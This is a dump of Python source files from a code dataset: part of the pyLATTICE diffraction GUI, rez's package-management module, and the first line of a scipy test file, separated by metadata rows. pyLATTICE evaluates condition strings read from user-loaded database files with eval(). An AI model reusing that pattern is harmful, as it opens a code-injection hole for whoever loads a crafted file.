#d[(h==k) & ~(l%2==0)]
#d = d.drop(r.index)
#split multiple conditions up
conds = sgconditions.split(';')
for c in conds: #these should be if:then statements, so remove the if:~thens
c = c.strip()
if not c.startswith('if'):
r = d[eval(c)]
d = d.drop(r.index)
else:
c = c.lstrip('if').strip()
iff, then = c.split(':') #eval doesn't care about spaces
#needed for eval
h = d.h; k = d.k; l = d.l
r = d[eval('(' + iff + ')& ~(' + then + ')')]
d = d.drop(r.index)
f = pd.concat([f,r])
f.sort(columns=['d-space','h','k','l'],ascending=False,inplace=True)
f.index = [x for x in range(len(f))]
self.common.Forbidden = f
self.Forbidden = self.common.Forbidden
return(d)
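#Illustration of the condition-string format consumed above (hypothetical
#values): a plain condition such as 'l%2==0' keeps only even-l reflections,
#while an 'if:then' pair such as 'if h==k : l%2==0' drops spots where h==k
#but l is odd; multiple conditions are joined with ';'.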
def setMineralList(self):
self.comboBox_mineraldb.clear()
self.minlist = list(self.mineraldb['Chemical'] + ': ' + self.mineraldb['Name'])
self.comboBox_mineraldb.addItems(self.minlist)
def removeMinerals(self):
QtCore.QObject.disconnect(self.comboBox_mineraldb, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setMineral)
mindiag = MineralListDialog()
model = QtGui.QStandardItemModel(mindiag.listView)
#mindiag.buttonBox.accepted.connect(mindiag.accept)
#mindiag.buttonBox.rejected.connect(mindiag.reject)
for mineral in self.minlist[1:]:
item = QtGui.QStandardItem(mineral)
item.setCheckable(True)
item.setEditable(False)
model.appendRow(item)
mindiag.listView.setModel(model)
if mindiag.exec_():
i=1
l=[]
while model.item(i):
if model.item(i).checkState():
l.append(i)
i += 1
self.mineraldb = self.mineraldb.drop(self.mineraldb.index[l])
self.mineraldb.index = list(range(len(self.mineraldb)))
self.setMineralList()
QtCore.QObject.connect(self.comboBox_mineraldb, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setMineral)
def AppendMineral(self):
QtCore.QObject.disconnect(self.comboBox_mineraldb, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setMineral)
dial = NewMineralDialog()
if dial.exec_():
name = dial.lineEdit_name.text()
sym = dial.lineEdit_sym.text()
if name == '':
name = 'Mineral'
if sym == '':
sym = 'XX'
#set special conditions to a bunch of strings or as a NaN
if self.manualConds == []:
SCs = np.nan
else:
SCs = ';'.join(self.manualConds)
params = {'Name':name, 'Chemical':sym,
'Crystal':self.comboBox_crystaltype.currentText(),
'UnitCell':self.comboBox_celltype.currentText(),
'SpaceGroup':int(self.comboBox_spacegroup.currentText().split(':')[0]),
'a':self.doubleSpinBox_a.value(),
'b':self.doubleSpinBox_b.value(),
'c':self.doubleSpinBox_c.value(),
'SpecialConditions':SCs}
self.mineraldb = self.mineraldb.append(params,ignore_index=True)
self.setMineralList()
QtCore.QObject.connect(self.comboBox_mineraldb, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setMineral)
def setSettings(self):
"""Raise SettingsDialog and pass values to pyLATTICE parameters.
Grab current settings first."""
current = {'a max':self.doubleSpinBox_a.maximum(),
'b max':self.doubleSpinBox_b.maximum(),
'c max':self.doubleSpinBox_c.maximum()}
dial = SettingsDialog(current)
if dial.exec_():
amax = dial.maxa.value()
bmax = dial.maxb.value()
cmax = dial.maxc.value()
#set slider and spinbox maxima
self.doubleSpinBox_a.setMaximum(amax)
self.doubleSpinBox_b.setMaximum(bmax)
self.doubleSpinBox_c.setMaximum(cmax)
self.hSlider_a.setMaximum(int(10*amax))
self.hSlider_b.setMaximum(int(10*bmax))
self.hSlider_c.setMaximum(int(10*cmax))
def ManualConditions(self):
"""Raise the manual space group conditions dialog"""
dial = ManualConditionsDialog(conditions= self.manualConds)
if dial.exec_():
num = dial.manualCondList.count()
self.manualConds = [dial.manualCondList.item(i).text() for i in range(num)]
def SaveDSpace(self):
self.Save(self.DSpaces)
def SaveMineralDB(self):
self.Save(self.mineraldb)
def LoadMineralDB(self):
QtCore.QObject.disconnect(self.comboBox_mineraldb, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setMineral)
ftypes = 'HDF (*.h5);;CSV (*.csv);;Excel (*.xlsx)'
fname,ffilter = QtGui.QFileDialog.getOpenFileNameAndFilter(self,caption='Load Mineral Database',directory=self.common.path,filter=ftypes)
fname = str(fname)
ffilter=str(ffilter)
#print(fname,ffilter)
name, ext = os.path.splitext(fname)
self.common.path = os.path.dirname(fname)
if ffilter.startswith('HDF'):
item = pd.read_hdf(name + '.h5','table')
elif ffilter.startswith('CSV'):
item = pd.read_csv(name + '.csv',sep=',')
elif ffilter.startswith('Excel'): #allow for different excel formats
sheetname,ok = QtGui.QInputDialog.getText(self,'Input Sheetname','Sheetname')
if ok and sheetname != '':
if ext == '.xlsx' or ext == '':
item = pd.read_excel(name + '.xlsx',str(sheetname))
elif ext == '.xls':
item = pd.read_excel(name + '.xls',str(sheetname))
self.mineraldb = item
else:
QtGui.QMessageBox.information(self, "Warning!", 'You must specify a sheet name!')
self.setMineralList()
QtCore.QObject.connect(self.comboBox_mineraldb, QtCore.SIGNAL(_fromUtf8("currentIndexChanged(QString)")), self.setMineral)
def Save(self,item):
#item should be pandas dataframe object
ftypes = 'HDF (*.h5);;CSV (*.csv);;Excel (*.xlsx)'
fname,ffilter = QtGui.QFileDialog.getSaveFileNameAndFilter(self,caption='Save D-Spacings',directory=self.common.path,filter=ftypes)
fname = str(fname)
ffilter=str(ffilter)
#print(fname,ffilter)
name, ext = os.path.splitext(fname)
self.common.path = os.path.dirname(fname)
print(name + ext)
if ffilter.startswith('HDF'):
item.to_hdf(name + '.h5','table')
elif ffilter.startswith('CSV'):
item.to_csv(name + '.csv',sep=',')
elif ffilter.startswith('Excel'): #allow for different excel formats
if ext == '.xlsx' or ext == '':
item.to_excel(name + '.xlsx')
elif ext == '.xls':
item.to_excel(name + '.xls')
################################################################################
############################### Plotting #######################################
################################################################################
def PlotDiffraction(self):
"""Plots the current list of spots and d-spacings.
For each point in self.DSpaces [d-space,h,k,l], determines anlges for plotting."""
#initialize plot with center spot only
self.Plot.clear()
self.common._x2 = False
self.Plot.set_xlabel(u'Distance (\u212B\u207B\u00B9)')#angstrom^-1
self.Plot.set_ylabel(u'Distance (\u212B\u207B\u00B9)')
#get values in energy, cam length, cam const. combo boxes
self.energy = self.spinBox_beamenergy.value()
self.camlength = self.spinBox_camlength.value()
self.camconst = self.doubleSpinBox_camconst.value()
#self.Plot.plot(0,0, linestyle = '', marker='o', markersize = 10, color = 'black',picker=5, label = u'0 0 0')
#add some labels
if self.checkBox_labels.isChecked():
#center spot
#self.Plot.annotate(u'0 0 0', xy = (0,0), xytext=(0,10),textcoords = 'offset points', ha = 'center', va = 'bottom',
# bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.01))
#add crystal structure information in an annotation
#grab current values
self.a = self.doubleSpinBox_a.value(); self.b = self.doubleSpinBox_b.value(); self.c = self.doubleSpinBox_c.value()
alph = self.spinBox_alpha.value(); beta = self.spinBox_beta.value(); gam = self.spinBox_gamma.value()
plot_label = r'''%s: %s; a = %.2f, b = %.2f, c = %.2f; $\alpha$ = %d$^o$, $\beta$ = %d$^o$, $\gamma$ = %d$^o$''' % (self.comboBox_crystaltype.currentText(),self.comboBox_celltype.currentText(),self.a,self.b,self.c,alph,beta,gam)
ann = self.Plot.annotate(plot_label, xy=(0.02, 1.02), xycoords='axes fraction',bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.01))
ann.draggable() #make annotation draggable
#need to choose a reference point with smallest sum of absolute miller indices
#since self.DSpaces is sorted with largest d-space first, this will be the smallest sum of abs miller indices
#first point
rotation = np.radians(float(self.comboBox_rotate.currentText()))
d = np.array(self.DSpaces['d-space'],dtype=np.float)
ref = np.array(self.DSpaces.loc[0,['h','k','l']],dtype=np.int)
Q2 = np.array(self.DSpaces[['h','k','l']],dtype=np.int)
recip_vec = np.array([self.astar,self.bstar,self.cstar],dtype=np.float)
dir_vec = np.array([self.u,self.v,self.w],dtype=np.int)
#add extra factor if hcp unit cell
t = self.comboBox_crystaltype.currentText()
#must check that Forbidden dataframe isn't empty for a specific zone axis
showf = self.checkBox_showforbidden.isChecked() and not self.Forbidden.empty
if t in ['Hexagonal','Trigonal']:
#print('Hexagonal')
#change dtypes
ref = np.array(ref,dtype=np.float)
Q2 = np.array(Q2,dtype=np.float)
lam = np.sqrt(2.0/3.0)*(self.c/self.a) #float literals avoid Python 2 integer division (2/3 == 0)
ref[2] = ref[2]/lam
ref = np.hstack([ref,-(ref[0]+ref[1])]) #add i direction, but at the end b/c it doesn't matter
Q2[:,2] = Q2[:,2]/lam
Q2 = np.append(Q2,np.array([-Q2[:,0]-Q2[:,1]]).T,axis=1)
theta,x,y = CalcSpotsHCP(d,Q2,ref,recip_vec,dir_vec,rotation)
if showf:
df = np.array(self.Forbidden['d-space'],dtype=np.float)
Q2f = np.array(self.Forbidden[['h','k','l']],dtype=np.int)
Q2f = np.array(Q2f,dtype=np.float)
Q2f[:,2] = Q2f[:,2]/lam
Q2f = np.append(Q2f,np.array([-Q2f[:,0]-Q2f[:,1]]).T,axis=1)
thetaf,xf,yf = CalcSpotsHCP(df,Q2f,ref,recip_vec,dir_vec,rotation)
else:
theta,x,y = CalcSpots(d,Q2,ref,recip_vec,self.G_inv,dir_vec,rotation)
if showf:
df = np.array(self.Forbidden['d-space'],dtype=np.float)
Q2f = np.array(self.Forbidden[['h','k','l']],dtype=np.int)
thetaf,xf,yf = CalcSpots(df,Q2f,ref,recip_vec,self.G_inv,dir_vec,rotation)
self.DSpaces['theta'] = np.degrees(theta).round(2); self.DSpaces['x'] = x; self.DSpaces['y'] = y
if showf:
self.Forbidden['theta'] = np.degrees(thetaf).round(2); self.Forbidden['x'] = xf; self.Forbidden['y'] = yf
for i in range(len(self.Forbidden)):
label = ' '.join([str(int(x)) for x in self.Forbidden.loc[i,['h','k','l']]]) #this is a bit dense, but makes a list of str() hkl values, then concatenates
#convert negative numbers to overline numbers for visual effect
for j,num in enumerate(self._overline_strings):
match = re.search(u'-%d' % (j+1),label)
if match:
label = re.sub(match.group(),num,label)
#add each label and coordinate to DSpace dataframe
# self.DSpaces.loc[i,'x'] = coords[0]
# self.DSpaces.loc[i,'y'] = coords[1]
self.Forbidden.loc[i,'label'] = label
#print(self.DSpaces)
#make label for each spot
for i in range(len(self.DSpaces)):
label = r' '.join([str(int(x)) for x in self.DSpaces.loc[i,['h','k','l']]]) #this is a bit dense, but makes a list of str() hkl values, then concatenates
#convert negative numbers to overline numbers for visual effect
for j,num in enumerate(self._overline_strings):
match = re.search(u'-%d' % (j+1),label)
if match:
label = re.sub(match.group(),num,label)
#add each label and coordinate to DSpace dataframe
# self.DSpaces.loc[i,'x'] = coords[0]
# self.DSpaces.loc[i,'y'] = coords[1]
label = r'$%s$' % label.replace(' ','\ ') #convert to mathtex string and add spaces
self.DSpaces.loc[i,'label'] = label
#add 000 spot
self.DSpaces.loc[len(self.DSpaces),['d-space','h','k','l','x','y','label']] = [0,0,0,0,0,0,r'$0\ 0\ 0$']
#print(self.DSpaces)
#scatterplots make it difficult to get data back in matplotlibwidget
# for i in range(len(self.DSpaces)):
self.Plot.plot(self.DSpaces['x'],self.DSpaces['y'],ls='',marker='o',markersize=10,color='k',picker=5)#,label='%i %i %i' % (self.DSpaces.loc[i,['h']],self.DSpaces.loc[i,['k']],self.DSpaces.loc[i,['l']]))
if showf:
self.Plot.plot(self.Forbidden['x'],self.Forbidden['y'],ls='',marker='o',markersize=7,color='gray', alpha=.7)
#xmax = max(self.DSpaces['x']); xmin = min(self.DSpaces['x'])
#ymax = max(self.DSpaces['y']); ymin = min(self.DSpaces['y'])
#self.Plot.set_xlim([1.5*xmin,1.5*xmax])
#self.Plot.set_ylim([1.5*ymin,1.5*ymax])
if self.checkBox_labels.isChecked():
for i in range(len(self.DSpaces)):
#label = self.MathLabels(i)
label = self.DSpaces.loc[i,'label']
self.Plot.annotate(label, xy = (self.DSpaces.loc[i,'x'],self.DSpaces.loc[i,'y']), xytext=(0,10),textcoords = 'offset points', ha = 'center', va = 'bottom',
bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.01))
if showf:
for i in range(len(self.Forbidden)):
#label = self.MathLabels(i)
label = self.Forbidden.loc[i,'label']
self.Plot.annotate(label, xy = (self.Forbidden.loc[i,'x'],self.Forbidden.loc[i,'y']), xytext=(0,10),textcoords = 'offset points', ha = 'center', va = 'bottom',color='gray',
bbox = dict(boxstyle = 'round,pad=0.5', fc = 'yellow', alpha = 0.01))
if showf:
self.common.Forbidden = self.Forbidden
self.common.DSpaces = self.DSpaces
self.common.a = self.doubleSpinBox_a.value()#for determining arrow size in plot
self.DiffWidget.canvas.draw()
def MathLabels(self,i):
'''Make labels with overlines instead of minus signs for plotting with matplotlib.
i is the index for DSpaces'''
label = r''
if self.DSpaces.loc[i,'h'] < 0:
label+=r'$\bar %i$ ' % abs(self.DSpaces.loc[i,'h'])
else:
label+=r'%i ' % self.DSpaces.loc[i,'h']
if self.DSpaces.loc[i,'k'] < 0:
label+=r'$\bar %i$ ' % abs(self.DSpaces.loc[i,'k'])
else:
label+=r'%i ' % self.DSpaces.loc[i,'k']
if self.DSpaces.loc[i,'l'] < 0:
label+=r'$\bar %i$' % abs(self.DSpaces.loc[i,'l'])
else:
label+=r'%i' % self.DSpaces.loc[i,'l']
return(label)
################################################################################
############################### Calculator #####################################
################################################################################
def Calculator(self):
"""Grabs current miller indices or zone directions and calls AngleCalc"""
h1 = int(self.comboBox_h1.currentText())
h2 = int(self.comboBox_h2.currentText())
k1 = int(self.comboBox_k1.currentText())
k2 = int(self.comboBox_k2.currentText())
l1 = int(self.comboBox_l1.currentText())
l2 = int(self.comboBox_l2.currentText())
i1 = -(h1+k1)
i2 = -(h2+k2)
hex = self.checkBox_hexagonal.isChecked()
angle = round(np.degrees(self.Diffraction.PlaneAngle(p1=np.array([h1,k1,l1]),p2=np.array([h2,k2,l2]),hex=hex)),2)
if np.isnan(angle):
QtGui.QMessageBox.information(self, "Uh, Oh!", 'There is no [0 0 0] direction/plane!')
else:
if self.checkBox_normals.isChecked():
self.lineEdit_angle.setText(u'φ = %.2f°' % angle)
bra = u'('
ket = u')'
elif not self.checkBox_normals.isChecked():
self.lineEdit_angle.setText(u'ρ = %.2f°' % angle)
bra = u'['
ket = u']'
if not hex:
hkls = [bra,h1,k1,l1,ket,bra,h2,k2,l2,ket]
for j,it in enumerate(hkls):
if type(it) == int and it < 0:
hkls[j] = self._overline_strings[abs(it)-1]
self.lineEdit_dirs.setText(u'%s%s%s%s%s \u2220 %s%s%s%s%s' % tuple(hkls))
else:
hkls = [bra,h1,k1,i1,l1,ket,bra,h2,k2,i2,l2,ket]
for j,it in enumerate(hkls):
if type(it) == int and it < 0:
hkls[j] = self._overline_strings[abs(it)-1]
self.lineEdit_dirs.setText(u'%s%s%s%s%s%s \u2220 %s%s%s%s%s%s' % tuple(hkls))
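#Diffraction.PlaneAngle presumably computes the standard metric-tensor angle
#(sketch): for plane normals h1, h2,
#   cos(phi) = (h1 . G* . h2) / sqrt((h1 . G* . h1)(h2 . G* . h2))
#with the direct tensor G in place of G* when treating [u v w] directions.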
def CalcLabels(self):
"""Rewrite labels for aesthetics"""
if self.checkBox_normals.isChecked():
self.label_h2.setText(u'h')
self.label_k2.setText(u'k')
self.label_l2.setText(u'l')
#self.label_h2.setAlignment(0x0004)
#self.label_k2.setAlignment(0x0004)
#self.label_l2.setAlignment(0x0004)
elif not self.checkBox_normals.isChecked():
self.label_h2.setText(u'u')
self.label_k2.setText(u'v')
self.label_l2.setText(u'w')
#self.label_h2.setAlignment(0x0004)
#self.label_k2.setAlignment(0x0004)
#self.label_l2.setAlignment(0x0004)
################################################################################
############################### Other ##########################################
################################################################################
def About(self):
"""Displays the About message"""
QtGui.QMessageBox.information(self, "About",
"""pyLATTICE %s:
Written by Evan Groopman
Based upon LATTICE (DOS) by Thomas Bernatowicz
c. 2011-2014
For help contact: eegroopm@gmail.com""" % self.version)
def HowTo(self):
"""How-to dialog box"""
howtomessage = (
"""
- Select crystal type, unit cell type, and lattice parameters to calculate the metric tensor.
- OR select a mineral from the database.
- D-spacings will be calculated between the selected Miller indices.
- Select zone axis and press "Plot" to show diffraction pattern.
- Select two diffraction spots to measure distance and angle.
Note: pyLATTICE only includes general reflection conditions for each space group. It does not include special conditions based upon multiplicity, site symmetry, etc., EXCEPT for FCC diamond #227.
""")
QtGui.QMessageBox.information(self, "How to use",
howtomessage)
| gpl-2.0 | -595,474,331,354,563,100 | 53.072646 | 240 | 0.610114 | false |
rsjohnco/rez | src/rez/packages_.py | 1 | 19212 | from rez.package_repository import package_repository_manager
from rez.package_resources_ import PackageFamilyResource, PackageResource, \
VariantResource, package_family_schema, package_schema, variant_schema, \
package_release_keys
from rez.package_serialise import dump_package_data
from rez.utils.data_utils import cached_property
from rez.utils.formatting import StringFormatMixin, StringFormatType
from rez.utils.filesystem import is_subdirectory
from rez.utils.schema import schema_keys
from rez.utils.resources import ResourceHandle, ResourceWrapper
from rez.exceptions import PackageMetadataError, PackageFamilyNotFoundError
from rez.vendor.version.version import VersionRange
from rez.vendor.version.requirement import VersionedObject
from rez.serialise import load_from_file, FileFormat
from rez.config import config
from rez.system import system
import os.path
import sys
#------------------------------------------------------------------------------
# package-related classes
#------------------------------------------------------------------------------
class PackageRepositoryResourceWrapper(ResourceWrapper, StringFormatMixin):
format_expand = StringFormatType.unchanged
def validated_data(self):
data = ResourceWrapper.validated_data(self)
data = dict((k, v) for k, v in data.iteritems() if v is not None)
return data
class PackageFamily(PackageRepositoryResourceWrapper):
"""A package family.
Note:
Do not instantiate this class directly, instead use the function
`iter_package_families`.
"""
keys = schema_keys(package_family_schema)
def __init__(self, resource):
assert isinstance(resource, PackageFamilyResource)
super(PackageFamily, self).__init__(resource)
def iter_packages(self):
"""Iterate over the packages within this family, in no particular order.
Returns:
`Package` iterator.
"""
repo = self.resource._repository
for package in repo.iter_packages(self.resource):
yield Package(package)
class PackageBaseResourceWrapper(PackageRepositoryResourceWrapper):
"""Abstract base class for `Package` and `Variant`.
"""
@property
def uri(self):
return self.resource.uri
@property
def config(self):
"""Returns the config for this package.
Defaults to global config if this package did not provide a 'config'
section.
"""
return self.resource.config or config
@cached_property
def is_local(self):
"""Returns True if the package is in the local package repository"""
local_repo = package_repository_manager.get_repository(
self.config.local_packages_path)
return (self.resource._repository.uid == local_repo.uid)
def print_info(self, buf=None, format_=FileFormat.yaml,
skip_attributes=None, include_release=False):
"""Print the contents of the package.
Args:
buf (file-like object): Stream to write to.
format_ (`FileFormat`): Format to write in.
skip_attributes (list of str): List of attributes to not print.
include_release (bool): If True, include release-related attributes,
such as 'timestamp' and 'changelog'
"""
data = self.validated_data().copy()
# config is a special case. We only really want to show any config settings
# that were in the package.py, not the entire Config contents that get
# grafted onto the Package/Variant instance. However Variant has an empty
# 'data' dict property, since it forwards data from its parent package.
data.pop("config", None)
if self.config:
if isinstance(self, Package):
config_dict = self.data.get("config")
else:
config_dict = self.parent.data.get("config")
data["config"] = config_dict
if not include_release:
skip_attributes = list(skip_attributes or []) + list(package_release_keys)
buf = buf or sys.stdout
dump_package_data(data, buf=buf, format_=format_,
skip_attributes=skip_attributes)
class Package(PackageBaseResourceWrapper):
"""A package.
Note:
Do not instantiate this class directly, instead use the function
`iter_packages` or `PackageFamily.iter_packages`.
"""
keys = schema_keys(package_schema)
def __init__(self, resource):
assert isinstance(resource, PackageResource)
super(Package, self).__init__(resource)
@cached_property
def qualified_name(self):
"""Get the qualified name of the package.
Returns:
str: Name of the package with version, eg "maya-2016.1".
"""
o = VersionedObject.construct(self.name, self.version)
return str(o)
@cached_property
def parent(self):
"""Get the parent package family.
Returns:
`PackageFamily`.
"""
repo = self.resource._repository
family = repo.get_parent_package_family(self.resource)
return PackageFamily(family) if family else None
@cached_property
def num_variants(self):
return len(self.data.get("variants", []))
def iter_variants(self):
"""Iterate over the variants within this package, in index order.
Returns:
`Variant` iterator.
"""
repo = self.resource._repository
for variant in repo.iter_variants(self.resource):
yield Variant(variant)
def get_variant(self, index=None):
"""Get the variant with the associated index.
Returns:
`Variant` object, or None if no variant with the given index exists.
"""
for variant in self.iter_variants():
if variant.index == index:
return variant
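# Illustrative sketch: get_variant() above returns None for a missing index,
# while iter_variants() yields variants in index order. The helper is
# hypothetical.
def _example_variant_names(package):
    """Return the qualified name of every variant in `package` (demo only)."""
    return [variant.qualified_name for variant in package.iter_variants()]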
class Variant(PackageBaseResourceWrapper):
"""A package variant.
Note:
Do not instantiate this class directly, instead use the function
`Package.iter_variants`.
"""
keys = schema_keys(variant_schema)
keys.update(["index", "root", "subpath"])
def __init__(self, resource):
assert isinstance(resource, VariantResource)
super(Variant, self).__init__(resource)
@cached_property
def qualified_package_name(self):
o = VersionedObject.construct(self.name, self.version)
return str(o)
@cached_property
def qualified_name(self):
"""Get the qualified name of the variant.
Returns:
str: Name of the variant with version and index, eg "maya-2016.1[1]".
"""
idxstr = '' if self.index is None else str(self.index)
return "%s[%s]" % (self.qualified_package_name, idxstr)
@cached_property
def parent(self):
"""Get the parent package.
Returns:
`Package`.
"""
repo = self.resource._repository
package = repo.get_parent_package(self.resource)
return Package(package)
def get_requires(self, build_requires=False, private_build_requires=False):
"""Get the requirements of the variant.
Args:
build_requires (bool): If True, include build requirements.
private_build_requires (bool): If True, include private build
requirements.
Returns:
List of `Requirement` objects.
"""
requires = self.requires or []
if build_requires:
requires = requires + (self.build_requires or [])
if private_build_requires:
requires = requires + (self.private_build_requires or [])
return requires
def install(self, path, dry_run=False, overrides=None):
"""Install this variant into another package repository.
If the package already exists, this variant will be correctly merged
into the package. If the variant already exists in this package, the
existing variant is returned.
Args:
path (str): Path to destination package repository.
dry_run (bool): If True, do not actually install the variant. In this
mode, a `Variant` instance is only returned if the equivalent
variant already exists in this repository; otherwise, None is
returned.
overrides (dict): Use this to change or add attributes to the
installed variant.
Returns:
`Variant` object - the (existing or newly created) variant in the
specified repository. If `dry_run` is True, None may be returned.
"""
repo = package_repository_manager.get_repository(path)
resource = repo.install_variant(self.resource,
dry_run=dry_run,
overrides=overrides)
if resource is None:
return None
elif resource is self.resource:
return self
else:
return Variant(resource)
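# Illustrative sketch: installing a variant into another repository, as
# documented above. The destination path and the 'timestamp' override are
# hypothetical values chosen for the demo.
def _example_install_variant(variant, dest_path="/tmp/packages"):
    """Install `variant` into `dest_path` with a release timestamp (demo only)."""
    import time
    return variant.install(dest_path, overrides={"timestamp": int(time.time())})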
class PackageSearchPath(object):
"""A list of package repositories.
For example, $REZ_PACKAGES_PATH refers to a list of repositories.
"""
def __init__(self, packages_path):
"""Create a package repository list.
Args:
packages_path (list of str): List of package repositories.
"""
self.paths = packages_path
def iter_packages(self, name, range_=None):
"""See `iter_packages`.
Returns:
`Package` iterator.
"""
for package in iter_packages(name=name, range_=range_, paths=self.paths):
yield package
def __contains__(self, package):
"""See if a package is in this list of repositories.
Note:
This does not verify the existence of the resource, only that the
resource's repository is in this list.
Args:
package (`Package` or `Variant`): Package to search for.
Returns:
bool: True if the resource is in the list of repositories, False
otherwise.
"""
return (package.resource._repository.uid in self._repository_uids)
@cached_property
def _repository_uids(self):
uids = set()
for path in self.paths:
repo = package_repository_manager.get_repository(path)
uids.add(repo.uid)
return uids
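# Illustrative sketch: membership in a PackageSearchPath is repository
# membership, not package existence - see __contains__ above. The helper is
# hypothetical; config.packages_path is the real default search path.
def _example_in_search_path(package):
    """Return True if `package` lives in a configured repository (demo only)."""
    search_path = PackageSearchPath(config.packages_path)
    return package in search_path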
#------------------------------------------------------------------------------
# resource acquisition functions
#------------------------------------------------------------------------------
def iter_package_families(paths=None):
"""Iterate over package families, in no particular order.
Note that multiple package families with the same name can be returned.
Unlike packages, families later in the search path are not hidden by earlier
families.
Args:
paths (list of str, optional): paths to search for package families,
defaults to `config.packages_path`.
Returns:
`PackageFamily` iterator.
"""
for path in (paths or config.packages_path):
repo = package_repository_manager.get_repository(path)
for resource in repo.iter_package_families():
yield PackageFamily(resource)
def iter_packages(name, range_=None, paths=None):
"""Iterate over `Package` instances, in no particular order.
Packages of the same name and version earlier in the search path take
precedence - equivalent packages later in the paths are ignored. Packages
are not returned in any specific order.
Args:
name (str): Name of the package, eg 'maya'.
range_ (VersionRange or str): If provided, limits the versions returned
to those in `range_`.
paths (list of str, optional): paths to search for packages, defaults
to `config.packages_path`.
Returns:
`Package` iterator.
"""
entries = _get_families(name, paths)
seen = set()
for repo, family_resource in entries:
for package_resource in repo.iter_packages(family_resource):
key = (package_resource.name, package_resource.version)
if key in seen:
continue
seen.add(key)
if range_:
if isinstance(range_, basestring):
range_ = VersionRange(range_)
if package_resource.version not in range_:
continue
yield Package(package_resource)
def get_package(name, version, paths=None):
"""Get an exact version of a package.
Args:
name (str): Name of the package, eg 'maya'.
version (Version or str): Version of the package, eg '1.0.0'
paths (list of str, optional): paths to search for package, defaults
to `config.packages_path`.
Returns:
`Package` object, or None if the package was not found.
"""
if isinstance(version, basestring):
range_ = VersionRange("==%s" % version)
else:
range_ = VersionRange.from_version(version, "==")
it = iter_packages(name, range_, paths)
try:
return it.next()
except StopIteration:
return None
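# Illustrative sketch: exact lookup with get_package() versus newest-in-range
# lookup with get_latest_package() (defined further down). The package name
# and versions are hypothetical values.
def _example_lookups(paths=None):
    """Fetch 'maya' two ways; either call may return None (demo only)."""
    exact = get_package("maya", "2016.1", paths=paths)
    latest = get_latest_package("maya", range_=VersionRange("2016+"),
                                paths=paths)
    return exact, latest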
def get_package_from_string(txt, paths=None):
"""Get a package given a string.
Args:
txt (str): String such as 'foo', 'bah-1.3'.
paths (list of str, optional): paths to search for package, defaults
to `config.packages_path`.
Returns:
`Package` instance, or None if no package was found.
"""
o = VersionedObject(txt)
return get_package(o.name, o.version, paths=paths)
def get_developer_package(path):
"""Load a developer package.
A developer package may for example be a package.yaml or package.py in a
user's source directory.
Note:
The resulting package has a 'filepath' attribute added to it, that does
not normally appear on a `Package` object. A developer package is the
only case where we know we can directly associate a 'package.*' file
with a package - other packages can come from any kind of package repo,
which may or may not associate a single file with a single package (or
any file for that matter - it may come from a database).
Args:
path: Directory containing the package definition file.
Returns:
`Package` object.
"""
data = None
for format_ in (FileFormat.py, FileFormat.yaml):
filepath = os.path.join(path, "package.%s" % format_.extension)
if os.path.isfile(filepath):
data = load_from_file(filepath, format_)
break
if data is None:
raise PackageMetadataError("No package definition file found at %s" % path)
name = data.get("name")
if name is None or not isinstance(name, basestring):
raise PackageMetadataError(
"Error in %r - missing or non-string field 'name'" % filepath)
package = create_package(name, data)
setattr(package, "filepath", filepath)
return package
def create_package(name, data):
"""Create a package given package data.
Args:
name (str): Package name.
data (dict): Package data. Must conform to `package_maker.package_schema`.
Returns:
`Package` object.
"""
from rez.package_maker__ import PackageMaker
maker = PackageMaker(name, data)
return maker.get_package()
def get_variant(variant_handle):
"""Create a variant given its handle.
Args:
variant_handle (`ResourceHandle` or dict): Resource handle, or
equivalent dict.
Returns:
`Variant`.
"""
if isinstance(variant_handle, dict):
variant_handle = ResourceHandle.from_dict(variant_handle)
variant_resource = package_repository_manager.get_resource(variant_handle)
variant = Variant(variant_resource)
return variant
def get_last_release_time(name, paths=None):
"""Returns the most recent time this package was released.
Note that releasing a variant into an already-released package is also
considered a package release.
Returns:
int: Epoch time of last package release, or zero if this cannot be
determined.
"""
entries = _get_families(name, paths)
max_time = 0
for repo, family_resource in entries:
time_ = repo.get_last_release_time(family_resource)
if time_ == 0:
return 0
max_time = max(max_time, time_)
return max_time
def get_completions(prefix, paths=None, family_only=False):
"""Get autocompletion options given a prefix string.
Example:
>>> get_completions("may")
set(["maya", "maya_utils"])
>>> get_completions("maya-")
set(["maya-2013.1", "maya-2015.0.sp1"])
Args:
prefix (str): Prefix to match.
paths (list of str): paths to search for packages, defaults to
`config.packages_path`.
family_only (bool): If True, only match package names, do not include
version component.
Returns:
Set of strings, may be empty.
"""
op = None
if prefix:
if prefix[0] in ('!', '~'):
if family_only:
return set()
op = prefix[0]
prefix = prefix[1:]
fam = None
for ch in ('-', '@', '#'):
if ch in prefix:
if family_only:
return set()
fam = prefix.split(ch)[0]
break
words = set()
if not fam:
words = set(x.name for x in iter_package_families(paths=paths)
if x.name.startswith(prefix))
if len(words) == 1:
fam = iter(words).next()
if family_only:
return words
if fam:
it = iter_packages(fam, paths=paths)
words.update(x.qualified_name for x in it
if x.qualified_name.startswith(prefix))
if op:
words = set(op + x for x in words)
return words
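# Illustrative sketch of the completion behaviour documented above; the
# prefixes mirror the docstring example and the helper is hypothetical.
def _example_completions(paths=None):
    """Complete a family prefix, then a family-plus-version prefix (demo only)."""
    families = get_completions("may", paths=paths, family_only=True)
    versions = get_completions("maya-", paths=paths)
    return families, versions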
def get_latest_package(name, range_=None, paths=None, error=False):
"""Get the latest package for a given package name.
Args:
name (str): Package name.
range_ (`VersionRange`): Version range to search within.
paths (list of str, optional): paths to search for package families,
defaults to `config.packages_path`.
error (bool): If True, raise an error if no package is found.
Returns:
`Package` object, or None if no package is found.
"""
it = iter_packages(name, range_=range_, paths=paths)
try:
return max(it, key=lambda x: x.version)
except ValueError: # empty sequence
if error:
raise PackageFamilyNotFoundError("No such package family %r" % name)
return None
def _get_families(name, paths=None):
entries = []
for path in (paths or config.packages_path):
repo = package_repository_manager.get_repository(path)
family_resource = repo.get_package_family(name)
if family_resource:
entries.append((repo, family_resource))
return entries
| gpl-3.0 | -1,390,221,877,218,622,700 | 31.617997 | 86 | 0.612846 | false |
Shaswat27/scipy | scipy/optimize/tests/test__differential_evolution.py | 1 | 17376 | """
